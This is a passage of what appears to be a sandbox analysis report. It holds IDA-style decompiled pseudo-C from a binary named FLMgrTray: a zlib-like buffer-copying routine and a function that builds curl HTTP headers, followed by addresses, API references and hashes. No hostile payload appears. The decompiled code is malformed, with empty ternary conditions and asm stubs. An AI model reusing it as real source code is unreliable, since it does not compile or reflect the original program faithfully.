                                                                                        				int _t273;
                                                                                        				int _t274;
                                                                                        				signed int _t283;
                                                                                        				signed int _t285;
                                                                                        				int _t287;
                                                                                        				intOrPtr* _t288;
                                                                                        				void* _t289;
                                                                                        
                                                                                        				_t288 = _a4;
                                                                                        				_t243 =  *(_t288 + 0x2c);
                                                                                        				_t147 =  *((intOrPtr*)(_t288 + 0xc)) + 0xfffffffb;
                                                                                        				_t244 =  <=  ? _t147 : _t243;
                                                                                        				_v20 =  <=  ? _t147 : _t243;
                                                                                        				_t283 = 0;
                                                                                        				_t245 = _a8;
                                                                                        				_v8 =  *((intOrPtr*)( *_t288 + 4));
                                                                                        				asm("o16 nop [eax+eax]");
                                                                                        				while(1) {
                                                                                        					_t152 =  *((intOrPtr*)(_t288 + 0x16bc)) + 0x2a >> 3;
                                                                                        					_t229 =  *((intOrPtr*)( *_t288 + 0x10));
                                                                                        					if(_t229 < _t152) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_v12 =  *(_t288 + 0x6c) -  *(_t288 + 0x5c);
                                                                                        					_t206 =  *_t288;
                                                                                        					_t288 = _a4;
                                                                                        					_t208 =  *((intOrPtr*)(_t206 + 4)) + _v12;
                                                                                        					_t275 =  <  ? _t208 : 0xffff;
                                                                                        					_t242 =  <=  ?  <  ? _t208 : 0xffff : _t229 - _t152;
                                                                                        					if(_t242 >= _v20) {
                                                                                        						L7:
                                                                                        						if(_t245 != 4) {
                                                                                        							L10:
                                                                                        							_t283 = 0;
                                                                                        							__eflags = 0;
                                                                                        						} else {
                                                                                        							_t301 = _t242 - _t208;
                                                                                        							if(_t242 != _t208) {
                                                                                        								goto L10;
                                                                                        							} else {
                                                                                        								_t283 = _t245 - 3;
                                                                                        							}
                                                                                        						}
                                                                                        						_v16 = _t283;
                                                                                        						E0018A530(_t288, _t288, 0, 0, _t283);
                                                                                        						 *( *((intOrPtr*)(_t288 + 0x14)) +  *((intOrPtr*)(_t288 + 8)) - 4) = _t242;
                                                                                        						 *((char*)( *((intOrPtr*)(_t288 + 0x14)) +  *((intOrPtr*)(_t288 + 8)) - 3)) = _t242 >> 8;
                                                                                        						 *( *((intOrPtr*)(_t288 + 0x14)) +  *((intOrPtr*)(_t288 + 8)) - 2) =  !_t242;
                                                                                        						 *((char*)( *((intOrPtr*)(_t288 + 0x14)) +  *((intOrPtr*)(_t288 + 8)) - 1)) =  !_t242 >> 8;
                                                                                        						E00188180(_t301,  *_t288);
                                                                                        						_t215 = _v12;
                                                                                        						_t289 = _t289 + 0x14;
                                                                                        						if(_t215 != 0) {
                                                                                        							_t287 =  <=  ? _t215 : _t242;
                                                                                        							memcpy( *( *_t288 + 0xc),  *(_t288 + 0x38) +  *(_t288 + 0x5c), _t287);
                                                                                        							_t289 = _t289 + 0xc;
                                                                                        							 *( *_t288 + 0xc) =  *( *_t288 + 0xc) + _t287;
                                                                                        							 *((intOrPtr*)( *_t288 + 0x10)) =  *((intOrPtr*)( *_t288 + 0x10)) - _t287;
                                                                                        							 *((intOrPtr*)( *_t288 + 0x14)) =  *((intOrPtr*)( *_t288 + 0x14)) + _t287;
                                                                                        							 *(_t288 + 0x5c) =  *(_t288 + 0x5c) + _t287;
                                                                                        							_t242 = _t242 - _t287;
                                                                                        							_t283 = _v16;
                                                                                        						}
                                                                                        						if(_t242 != 0) {
                                                                                        							E00188350( *_t288,  *( *_t288 + 0xc), _t242);
                                                                                        							_t289 = _t289 + 0xc;
                                                                                        							 *( *_t288 + 0xc) =  *( *_t288 + 0xc) + _t242;
                                                                                        							 *((intOrPtr*)( *_t288 + 0x10)) =  *((intOrPtr*)( *_t288 + 0x10)) - _t242;
                                                                                        							 *((intOrPtr*)( *_t288 + 0x14)) =  *((intOrPtr*)( *_t288 + 0x14)) + _t242;
                                                                                        						}
                                                                                        						_t245 = _a8;
                                                                                        						if(_t283 == 0) {
                                                                                        							continue;
                                                                                        						}
                                                                                        					} else {
                                                                                        						if(_t242 != 0 || _t245 == 4) {
                                                                                        							if(_t245 != 0 && _t242 == _t208) {
                                                                                        								goto L7;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					break;
                                                                                        				}
                                                                                        				_t153 =  *_t288;
                                                                                        				_t247 = _v8 -  *((intOrPtr*)(_t153 + 4));
                                                                                        				_v8 = _t247;
                                                                                        				if(_t247 == 0) {
                                                                                        					_t267 =  *(_t288 + 0x6c);
                                                                                        				} else {
                                                                                        					_t236 =  *(_t288 + 0x2c);
                                                                                        					if(_t247 < _t236) {
                                                                                        						_t273 =  *(_t288 + 0x6c);
                                                                                        						__eflags =  *((intOrPtr*)(_t288 + 0x3c)) - _t273 - _t247;
                                                                                        						if( *((intOrPtr*)(_t288 + 0x3c)) - _t273 <= _t247) {
                                                                                        							_t274 = _t273 - _t236;
                                                                                        							 *(_t288 + 0x6c) = _t274;
                                                                                        							memcpy( *(_t288 + 0x38),  *(_t288 + 0x38) + _t236, _t274);
                                                                                        							_t199 =  *(_t288 + 0x16b0);
                                                                                        							_t289 = _t289 + 0xc;
                                                                                        							_t247 = _v8;
                                                                                        							__eflags = _t199 - 2;
                                                                                        							if(_t199 < 2) {
                                                                                        								_t200 = _t199 + 1;
                                                                                        								__eflags = _t200;
                                                                                        								 *(_t288 + 0x16b0) = _t200;
                                                                                        							}
                                                                                        						}
                                                                                        						memcpy( *(_t288 + 0x38) +  *(_t288 + 0x6c),  *((intOrPtr*)( *_t288)) - _t247, _t247);
                                                                                        						_t289 = _t289 + 0xc;
                                                                                        						_t75 = _t288 + 0x6c;
                                                                                        						 *_t75 =  *(_t288 + 0x6c) + _v8;
                                                                                        						__eflags =  *_t75;
                                                                                        						_t267 =  *(_t288 + 0x6c);
                                                                                        						_t237 =  *(_t288 + 0x2c);
                                                                                        					} else {
                                                                                        						 *(_t288 + 0x16b0) = 2;
                                                                                        						memcpy( *(_t288 + 0x38),  *_t153 - _t236, _t236);
                                                                                        						_t267 =  *(_t288 + 0x2c);
                                                                                        						_t289 = _t289 + 0xc;
                                                                                        						 *(_t288 + 0x6c) = _t267;
                                                                                        						_t237 = _t267;
                                                                                        					}
                                                                                        					_t196 =  *((intOrPtr*)(_t288 + 0x16b4));
                                                                                        					_t238 = _t237 - _t196;
                                                                                        					 *(_t288 + 0x5c) = _t267;
                                                                                        					_t239 =  <=  ? _v8 : _t238;
                                                                                        					_t240 = ( <=  ? _v8 : _t238) + _t196;
                                                                                        					 *((intOrPtr*)(_t288 + 0x16b4)) = ( <=  ? _v8 : _t238) + _t196;
                                                                                        				}
                                                                                        				_t248 = _t267;
                                                                                        				_t154 = _t248;
                                                                                        				_a4 = _t248;
                                                                                        				if( *(_t288 + 0x16c0) < _t267) {
                                                                                        					 *(_t288 + 0x16c0) = _t267;
                                                                                        					_a4 = _t248;
                                                                                        				}
                                                                                        				if(_t283 == 0) {
                                                                                        					_t230 = _a8;
                                                                                        					__eflags = _t230;
                                                                                        					if(_t230 == 0) {
                                                                                        						L34:
                                                                                        						_t155 =  *_t288;
                                                                                        						_v8 =  *((intOrPtr*)(_t288 + 0x3c)) - _t267 - 1;
                                                                                        						__eflags =  *((intOrPtr*)(_t155 + 4)) - _v8;
                                                                                        						_t156 = _a4;
                                                                                        						_v12 =  *_t288;
                                                                                        						_t253 = _t267;
                                                                                        						if( *((intOrPtr*)(_t155 + 4)) <= _v8) {
                                                                                        							L39:
                                                                                        							_t157 = _v8;
                                                                                        							_t268 = _a4;
                                                                                        						} else {
                                                                                        							_v16 =  *(_t288 + 0x5c);
                                                                                        							_a4 = _t156;
                                                                                        							_t178 =  *(_t288 + 0x2c);
                                                                                        							_v12 =  *_t288;
                                                                                        							_t253 = _t267;
                                                                                        							__eflags = _v16 - _t178;
                                                                                        							if(_v16 < _t178) {
                                                                                        								goto L39;
                                                                                        							} else {
                                                                                        								_t272 = _t267 - _t178;
                                                                                        								 *(_t288 + 0x6c) = _t272;
                                                                                        								 *(_t288 + 0x5c) = _v16 - _t178;
                                                                                        								memcpy( *(_t288 + 0x38),  *(_t288 + 0x38) + _t178, _t272);
                                                                                        								_t181 =  *(_t288 + 0x16b0);
                                                                                        								_t289 = _t289 + 0xc;
                                                                                        								__eflags = _t181 - 2;
                                                                                        								if(_t181 < 2) {
                                                                                        									_t183 = _t181 + 1;
                                                                                        									__eflags = _t183;
                                                                                        									 *(_t288 + 0x16b0) = _t183;
                                                                                        								}
                                                                                        								_t157 = _v8 +  *(_t288 + 0x2c);
                                                                                        								_v12 =  *_t288;
                                                                                        								_t253 =  *(_t288 + 0x6c);
                                                                                        								_t268 = _t253;
                                                                                        							}
                                                                                        						}
                                                                                        						_t233 =  *((intOrPtr*)(_v12 + 4));
                                                                                        						__eflags = _t157 - _t233;
                                                                                        						_t234 =  <=  ? _t157 : _t233;
                                                                                        						_a4 = _t234;
                                                                                        						__eflags = _t234;
                                                                                        						_t235 = _a8;
                                                                                        						if(_t234 != 0) {
                                                                                        							E00188350(_v12,  *(_t288 + 0x38) + _t268, _a4);
                                                                                        							_t289 = _t289 + 0xc;
                                                                                        							_t127 = _t288 + 0x6c;
                                                                                        							 *_t127 =  *(_t288 + 0x6c) + _a4;
                                                                                        							__eflags =  *_t127;
                                                                                        							_t253 =  *(_t288 + 0x6c);
                                                                                        						}
                                                                                        						__eflags =  *(_t288 + 0x16c0) - _t253;
                                                                                        						if( *(_t288 + 0x16c0) < _t253) {
                                                                                        							 *(_t288 + 0x16c0) = _t253;
                                                                                        						}
                                                                                        						_t270 =  *((intOrPtr*)(_t288 + 0xc)) - ( *((intOrPtr*)(_t288 + 0x16bc)) + 0x2a >> 3);
                                                                                        						__eflags = _t270 - 0xffff;
                                                                                        						_t271 =  >  ? 0xffff : _t270;
                                                                                        						_t162 =  *(_t288 + 0x2c);
                                                                                        						_t254 = _t253 -  *(_t288 + 0x5c);
                                                                                        						__eflags = _t271 - _t162;
                                                                                        						_t163 =  <=  ? _t271 : _t162;
                                                                                        						__eflags = _t254 - ( <=  ? _t271 : _t162);
                                                                                        						if(_t254 >= ( <=  ? _t271 : _t162)) {
                                                                                        							L50:
                                                                                        							__eflags = _t254 - _t271;
                                                                                        							_t165 =  >  ? _t271 : _t254;
                                                                                        							_a4 =  >  ? _t271 : _t254;
                                                                                        							__eflags = _t235 - 4;
                                                                                        							if(_t235 != 4) {
                                                                                        								L54:
                                                                                        								_t283 = 0;
                                                                                        								__eflags = 0;
                                                                                        							} else {
                                                                                        								_t172 =  *_t288;
                                                                                        								__eflags =  *(_t172 + 4);
                                                                                        								_t165 = _a4;
                                                                                        								if( *(_t172 + 4) != 0) {
                                                                                        									goto L54;
                                                                                        								} else {
                                                                                        									__eflags = _t165 - _t254;
                                                                                        									if(_t165 != _t254) {
                                                                                        										goto L54;
                                                                                        									} else {
                                                                                        										_t283 = _t235 - 3;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        							E0018A530(_t288, _t288,  *(_t288 + 0x38) +  *(_t288 + 0x5c), _t165, _t283);
                                                                                        							_t144 = _t288 + 0x5c;
                                                                                        							 *_t144 =  *(_t288 + 0x5c) + _a4;
                                                                                        							__eflags =  *_t144;
                                                                                        							E00188180( *_t144,  *_t288);
                                                                                        						} else {
                                                                                        							__eflags = _t254;
                                                                                        							if(_t254 != 0) {
                                                                                        								L47:
                                                                                        								__eflags = _t235;
                                                                                        								if(_t235 != 0) {
                                                                                        									_t173 =  *_t288;
                                                                                        									__eflags =  *(_t173 + 4);
                                                                                        									if( *(_t173 + 4) == 0) {
                                                                                        										__eflags = _t254 - _t271;
                                                                                        										if(_t254 <= _t271) {
                                                                                        											goto L50;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								__eflags = _t235 - 4;
                                                                                        								if(_t235 == 4) {
                                                                                        									goto L47;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						asm("sbb edi, edi");
                                                                                        						_t285 =  ~_t283 & 0x00000002;
                                                                                        						__eflags = _t285;
                                                                                        						return _t285;
                                                                                        					} else {
                                                                                        						_a4 = _t154;
                                                                                        						__eflags = _t230 - 4;
                                                                                        						if(_t230 == 4) {
                                                                                        							goto L34;
                                                                                        						} else {
                                                                                        							_t184 =  *_t288;
                                                                                        							_a4 = _t248;
                                                                                        							__eflags =  *(_t184 + 4);
                                                                                        							if( *(_t184 + 4) != 0) {
                                                                                        								goto L34;
                                                                                        							} else {
                                                                                        								_a4 = _t248;
                                                                                        								__eflags = _t267 -  *(_t288 + 0x5c);
                                                                                        								if(_t267 !=  *(_t288 + 0x5c)) {
                                                                                        									goto L34;
                                                                                        								} else {
                                                                                        									return 1;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					return 3;
                                                                                        				}
                                                                                        			}























































                                                                                        0x00187918
                                                                                        0x0018791f
                                                                                        0x00187922
                                                                                        0x00187927
                                                                                        0x0018792c
                                                                                        0x0018792f
                                                                                        0x00187931
                                                                                        0x00187937
                                                                                        0x0018793a
                                                                                        0x00187940
                                                                                        0x00187950
                                                                                        0x00187953
                                                                                        0x00187958
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187966
                                                                                        0x00187969
                                                                                        0x0018796b
                                                                                        0x00187971
                                                                                        0x00187976
                                                                                        0x0018797b
                                                                                        0x00187981
                                                                                        0x001879a0
                                                                                        0x001879a3
                                                                                        0x001879ae
                                                                                        0x001879ae
                                                                                        0x001879ae
                                                                                        0x001879a5
                                                                                        0x001879a5
                                                                                        0x001879a7
                                                                                        0x00000000
                                                                                        0x001879a9
                                                                                        0x001879a9
                                                                                        0x001879a9
                                                                                        0x001879a7
                                                                                        0x001879b6
                                                                                        0x001879b9
                                                                                        0x001879c9
                                                                                        0x001879d3
                                                                                        0x001879e1
                                                                                        0x001879f2
                                                                                        0x001879f8
                                                                                        0x001879fd
                                                                                        0x00187a00
                                                                                        0x00187a05
                                                                                        0x00187a0b
                                                                                        0x00187a1b
                                                                                        0x00187a22
                                                                                        0x00187a25
                                                                                        0x00187a2a
                                                                                        0x00187a2f
                                                                                        0x00187a32
                                                                                        0x00187a35
                                                                                        0x00187a37
                                                                                        0x00187a37
                                                                                        0x00187a3c
                                                                                        0x00187a45
                                                                                        0x00187a4c
                                                                                        0x00187a4f
                                                                                        0x00187a54
                                                                                        0x00187a59
                                                                                        0x00187a59
                                                                                        0x00187a5c
                                                                                        0x00187a61
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187983
                                                                                        0x00187985
                                                                                        0x00187992
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187992
                                                                                        0x00187985
                                                                                        0x00000000
                                                                                        0x00187981
                                                                                        0x00187a67
                                                                                        0x00187a6c
                                                                                        0x00187a6f
                                                                                        0x00187a72
                                                                                        0x00187b1a
                                                                                        0x00187a78
                                                                                        0x00187a78
                                                                                        0x00187a7d
                                                                                        0x00187aa7
                                                                                        0x00187aac
                                                                                        0x00187aae
                                                                                        0x00187ab3
                                                                                        0x00187ab6
                                                                                        0x00187abe
                                                                                        0x00187ac3
                                                                                        0x00187ac9
                                                                                        0x00187acc
                                                                                        0x00187acf
                                                                                        0x00187ad2
                                                                                        0x00187ad4
                                                                                        0x00187ad4
                                                                                        0x00187ad5
                                                                                        0x00187ad5
                                                                                        0x00187ad2
                                                                                        0x00187aea
                                                                                        0x00187af2
                                                                                        0x00187af5
                                                                                        0x00187af5
                                                                                        0x00187af5
                                                                                        0x00187af8
                                                                                        0x00187afb
                                                                                        0x00187a7f
                                                                                        0x00187a7f
                                                                                        0x00187a92
                                                                                        0x00187a97
                                                                                        0x00187a9a
                                                                                        0x00187a9d
                                                                                        0x00187aa0
                                                                                        0x00187aa0
                                                                                        0x00187afe
                                                                                        0x00187b04
                                                                                        0x00187b09
                                                                                        0x00187b0c
                                                                                        0x00187b10
                                                                                        0x00187b12
                                                                                        0x00187b12
                                                                                        0x00187b1d
                                                                                        0x00187b1f
                                                                                        0x00187b21
                                                                                        0x00187b2a
                                                                                        0x00187b2c
                                                                                        0x00187b32
                                                                                        0x00187b32
                                                                                        0x00187b37
                                                                                        0x00187b45
                                                                                        0x00187b48
                                                                                        0x00187b4a
                                                                                        0x00187b73
                                                                                        0x00187b76
                                                                                        0x00187b7b
                                                                                        0x00187b83
                                                                                        0x00187b86
                                                                                        0x00187b89
                                                                                        0x00187b8c
                                                                                        0x00187b8e
                                                                                        0x00187be9
                                                                                        0x00187be9
                                                                                        0x00187bec
                                                                                        0x00187b90
                                                                                        0x00187b93
                                                                                        0x00187b98
                                                                                        0x00187b9b
                                                                                        0x00187b9e
                                                                                        0x00187ba1
                                                                                        0x00187ba3
                                                                                        0x00187ba6
                                                                                        0x00000000
                                                                                        0x00187ba8
                                                                                        0x00187bab
                                                                                        0x00187baf
                                                                                        0x00187bb2
                                                                                        0x00187bbd
                                                                                        0x00187bc2
                                                                                        0x00187bc8
                                                                                        0x00187bcb
                                                                                        0x00187bce
                                                                                        0x00187bd0
                                                                                        0x00187bd0
                                                                                        0x00187bd1
                                                                                        0x00187bd1
                                                                                        0x00187bdc
                                                                                        0x00187bdf
                                                                                        0x00187be2
                                                                                        0x00187be5
                                                                                        0x00187be5
                                                                                        0x00187ba6
                                                                                        0x00187bf2
                                                                                        0x00187bf5
                                                                                        0x00187bf7
                                                                                        0x00187bfa
                                                                                        0x00187bfd
                                                                                        0x00187bff
                                                                                        0x00187c02
                                                                                        0x00187c10
                                                                                        0x00187c18
                                                                                        0x00187c1b
                                                                                        0x00187c1b
                                                                                        0x00187c1b
                                                                                        0x00187c1e
                                                                                        0x00187c1e
                                                                                        0x00187c21
                                                                                        0x00187c27
                                                                                        0x00187c29
                                                                                        0x00187c29
                                                                                        0x00187c3e
                                                                                        0x00187c45
                                                                                        0x00187c47
                                                                                        0x00187c4a
                                                                                        0x00187c4d
                                                                                        0x00187c50
                                                                                        0x00187c52
                                                                                        0x00187c55
                                                                                        0x00187c57
                                                                                        0x00187c72
                                                                                        0x00187c72
                                                                                        0x00187c76
                                                                                        0x00187c79
                                                                                        0x00187c7c
                                                                                        0x00187c7f
                                                                                        0x00187c95
                                                                                        0x00187c95
                                                                                        0x00187c95
                                                                                        0x00187c81
                                                                                        0x00187c81
                                                                                        0x00187c83
                                                                                        0x00187c87
                                                                                        0x00187c8a
                                                                                        0x00000000
                                                                                        0x00187c8c
                                                                                        0x00187c8c
                                                                                        0x00187c8e
                                                                                        0x00000000
                                                                                        0x00187c90
                                                                                        0x00187c90
                                                                                        0x00187c90
                                                                                        0x00187c8e
                                                                                        0x00187c8a
                                                                                        0x00187ca1
                                                                                        0x00187cab
                                                                                        0x00187cab
                                                                                        0x00187cab
                                                                                        0x00187cae
                                                                                        0x00187c59
                                                                                        0x00187c59
                                                                                        0x00187c5b
                                                                                        0x00187c62
                                                                                        0x00187c62
                                                                                        0x00187c64
                                                                                        0x00187c66
                                                                                        0x00187c68
                                                                                        0x00187c6c
                                                                                        0x00187c6e
                                                                                        0x00187c70
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187c70
                                                                                        0x00187c6c
                                                                                        0x00187c5d
                                                                                        0x00187c5d
                                                                                        0x00187c60
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187c60
                                                                                        0x00187c5b
                                                                                        0x00187cb8
                                                                                        0x00187cba
                                                                                        0x00187cba
                                                                                        0x00187cc5
                                                                                        0x00187b4c
                                                                                        0x00187b4c
                                                                                        0x00187b4f
                                                                                        0x00187b52
                                                                                        0x00000000
                                                                                        0x00187b54
                                                                                        0x00187b54
                                                                                        0x00187b56
                                                                                        0x00187b59
                                                                                        0x00187b5d
                                                                                        0x00000000
                                                                                        0x00187b5f
                                                                                        0x00187b5f
                                                                                        0x00187b62
                                                                                        0x00187b65
                                                                                        0x00000000
                                                                                        0x00187b69
                                                                                        0x00187b72
                                                                                        0x00187b72
                                                                                        0x00187b65
                                                                                        0x00187b5d
                                                                                        0x00187b52
                                                                                        0x00187b3b
                                                                                        0x00187b44
                                                                                        0x00187b44

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00187A1B
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00187A92
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00187ABE
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00187AEA
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00187BBD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3510742995-0
                                                                                        • Opcode ID: d81cb95e66dc0ab6a2ac522e2ce8f89c160048839dce09cbd9e45b8d8bcb4dc2
                                                                                        • Instruction ID: 13bb18e4ae36895cce2edb26e8999ea4299bfca76cbab1cdd3e264b3ce5601ae
                                                                                        • Opcode Fuzzy Hash: d81cb95e66dc0ab6a2ac522e2ce8f89c160048839dce09cbd9e45b8d8bcb4dc2
                                                                                        • Instruction Fuzzy Hash: EDD10675A046049FCB24EF6DC8C096AB7E2FF98314B28896DE88AC7751D731EA44CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 22%
                                                                                        			E00167380(void* __ebx, intOrPtr __ecx, intOrPtr* _a4) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				void* _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				char _v52;
                                                                                        				char _v68;
                                                                                        				signed int _v72;
                                                                                        				signed int _v76;
                                                                                        				signed int _v80;
                                                                                        				signed int _v84;
                                                                                        				intOrPtr _v88;
                                                                                        				intOrPtr _v92;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t84;
                                                                                        				signed int _t85;
                                                                                        				intOrPtr _t89;
                                                                                        				intOrPtr* _t92;
                                                                                        				signed int _t95;
                                                                                        				char _t105;
                                                                                        				intOrPtr _t111;
                                                                                        				intOrPtr* _t113;
                                                                                        				intOrPtr* _t115;
                                                                                        				intOrPtr _t116;
                                                                                        				intOrPtr _t117;
                                                                                        				intOrPtr _t120;
                                                                                        				void* _t124;
                                                                                        				void* _t125;
                                                                                        				intOrPtr _t127;
                                                                                        				void* _t128;
                                                                                        				signed int _t134;
                                                                                        				void* _t136;
                                                                                        				void* _t137;
                                                                                        				intOrPtr* _t143;
                                                                                        				void* _t144;
                                                                                        				intOrPtr _t145;
                                                                                        				signed int _t149;
                                                                                        				signed int _t150;
                                                                                        				intOrPtr _t151;
                                                                                        				signed int _t152;
                                                                                        				void* _t153;
                                                                                        				void* _t154;
                                                                                        				void* _t157;
                                                                                        				intOrPtr _t158;
                                                                                        				intOrPtr* _t161;
                                                                                        				signed int _t162;
                                                                                        				void* _t163;
                                                                                        				void* _t164;
                                                                                        
                                                                                        				_t128 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018CE71);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t164 = _t163 - 0x4c;
                                                                                        				_t84 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t85 = _t84 ^ _t162;
                                                                                        				_v20 = _t85;
                                                                                        				_push(_t85);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v92 = __ecx;
                                                                                        				_t149 = 0;
                                                                                        				_v76 = 0;
                                                                                        				_v72 = 0;
                                                                                        				_t89 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x28))));
                                                                                        				_v88 = _t89;
                                                                                        				if(_t89 == 0) {
                                                                                        					L38:
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return E001755F4(_v20 ^ _t162);
                                                                                        				}
                                                                                        				_v84 = 0;
                                                                                        				_t92 =  *_a4;
                                                                                        				_t161 =  *_t92;
                                                                                        				if(_t161 == _t92) {
                                                                                        					goto L38;
                                                                                        				}
                                                                                        				while(1) {
                                                                                        					_t157 = _t161 + 0x10;
                                                                                        					_t134 =  *(_t157 + 0x10);
                                                                                        					_v28 = 0;
                                                                                        					_v24 = 0;
                                                                                        					_v80 = _t134;
                                                                                        					if( *((intOrPtr*)(_t161 + 0x24)) >= 0x10) {
                                                                                        						_t157 =  *_t157;
                                                                                        					}
                                                                                        					if(_t134 >= 0x10) {
                                                                                        						goto L7;
                                                                                        					}
                                                                                        					asm("movups xmm0, [edi]");
                                                                                        					_v28 = _t134;
                                                                                        					_v24 = 0xf;
                                                                                        					asm("movups [ebp-0x28], xmm0");
                                                                                        					L14:
                                                                                        					_t101 =  *((intOrPtr*)(_t161 + 0x38));
                                                                                        					_v8 = 0;
                                                                                        					if( *((intOrPtr*)(_t161 + 0x38)) != 0) {
                                                                                        						_t150 = _t149 | 0x00000001;
                                                                                        						_v8 = 1;
                                                                                        						_v52 = 0;
                                                                                        						_v48 = 0xf;
                                                                                        						_v68 = 0;
                                                                                        						_v72 = _t150;
                                                                                        						_v76 = _t150;
                                                                                        						E001683E0(_t128,  &_v68, _t157, _t161, _t101 + 2);
                                                                                        						_push(2);
                                                                                        						E001661B0( &_v68, ": ");
                                                                                        						_t105 = _t161 + 0x28;
                                                                                        						if( *((intOrPtr*)(_t161 + 0x3c)) >= 0x10) {
                                                                                        							_t105 =  *((intOrPtr*)(_t161 + 0x28));
                                                                                        						}
                                                                                        						_push( *((intOrPtr*)(_t161 + 0x38)));
                                                                                        						E001661B0( &_v68, _t105);
                                                                                        						_push(_v52);
                                                                                        						_t108 =  >=  ? _v68 :  &_v68;
                                                                                        						E001661B0( &_v44,  >=  ? _v68 :  &_v68);
                                                                                        						_v72 = _v72 & 0xfffffffe;
                                                                                        						_t151 = _v48;
                                                                                        						_v8 = 0;
                                                                                        						if(_t151 < 0x10) {
                                                                                        							L22:
                                                                                        							_t111 =  >=  ? _v44 :  &_v44;
                                                                                        							__imp__curl_slist_append(_v84, _t111);
                                                                                        							_t158 = _t111;
                                                                                        							_v84 = _t158;
                                                                                        							__imp__curl_easy_setopt(_v88, 0x2727, _t158);
                                                                                        							_t164 = _t164 + 0x14;
                                                                                        							_v8 = 0xffffffff;
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x28)) + 4)) = _t158;
                                                                                        							_t152 = _v24;
                                                                                        							if(_t152 < 0x10) {
                                                                                        								L26:
                                                                                        								_t113 =  *((intOrPtr*)(_t161 + 8));
                                                                                        								if( *((char*)(_t113 + 0xd)) == 0) {
                                                                                        									_t161 = _t113;
                                                                                        									_t143 =  *_t161;
                                                                                        									if( *((char*)(_t143 + 0xd)) != 0) {
                                                                                        										L35:
                                                                                        										if(_t161 ==  *_a4) {
                                                                                        											goto L38;
                                                                                        										}
                                                                                        										_t149 = _v72;
                                                                                        										continue;
                                                                                        									}
                                                                                        									do {
                                                                                        										_t115 =  *_t143;
                                                                                        										_t161 = _t143;
                                                                                        										_t143 = _t115;
                                                                                        									} while ( *((char*)(_t115 + 0xd)) == 0);
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								_t116 =  *((intOrPtr*)(_t161 + 4));
                                                                                        								if( *((char*)(_t116 + 0xd)) != 0) {
                                                                                        									L31:
                                                                                        									_t161 = _t116;
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								while(_t161 ==  *((intOrPtr*)(_t116 + 8))) {
                                                                                        									_t161 = _t116;
                                                                                        									_t116 =  *((intOrPtr*)(_t116 + 4));
                                                                                        									if( *((char*)(_t116 + 0xd)) == 0) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									goto L31;
                                                                                        								}
                                                                                        								goto L31;
                                                                                        							}
                                                                                        							_t144 = _v44;
                                                                                        							_t153 = _t152 + 1;
                                                                                        							_t117 = _t144;
                                                                                        							if(_t153 < 0x1000) {
                                                                                        								L25:
                                                                                        								_push(_t153);
                                                                                        								E00175733(_t117, _t144);
                                                                                        								_t164 = _t164 + 8;
                                                                                        								goto L26;
                                                                                        							}
                                                                                        							_t144 =  *((intOrPtr*)(_t144 - 4));
                                                                                        							_t153 = _t153 + 0x23;
                                                                                        							if(_t117 > 0x1f) {
                                                                                        								goto L37;
                                                                                        							}
                                                                                        							goto L25;
                                                                                        						} else {
                                                                                        							_t145 = _v68;
                                                                                        							_t154 = _t151 + 1;
                                                                                        							_t120 = _t145;
                                                                                        							if(_t154 < 0x1000) {
                                                                                        								L21:
                                                                                        								_push(_t154);
                                                                                        								E00175733(_t120, _t145);
                                                                                        								_t164 = _t164 + 8;
                                                                                        								goto L22;
                                                                                        							}
                                                                                        							_t145 =  *((intOrPtr*)(_t145 - 4));
                                                                                        							_t154 = _t154 + 0x23;
                                                                                        							if(_t120 > 0x1f) {
                                                                                        								L37:
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								goto L38;
                                                                                        							}
                                                                                        							goto L21;
                                                                                        						}
                                                                                        					}
                                                                                        					_push(1);
                                                                                        					E001661B0( &_v44, ";");
                                                                                        					goto L22;
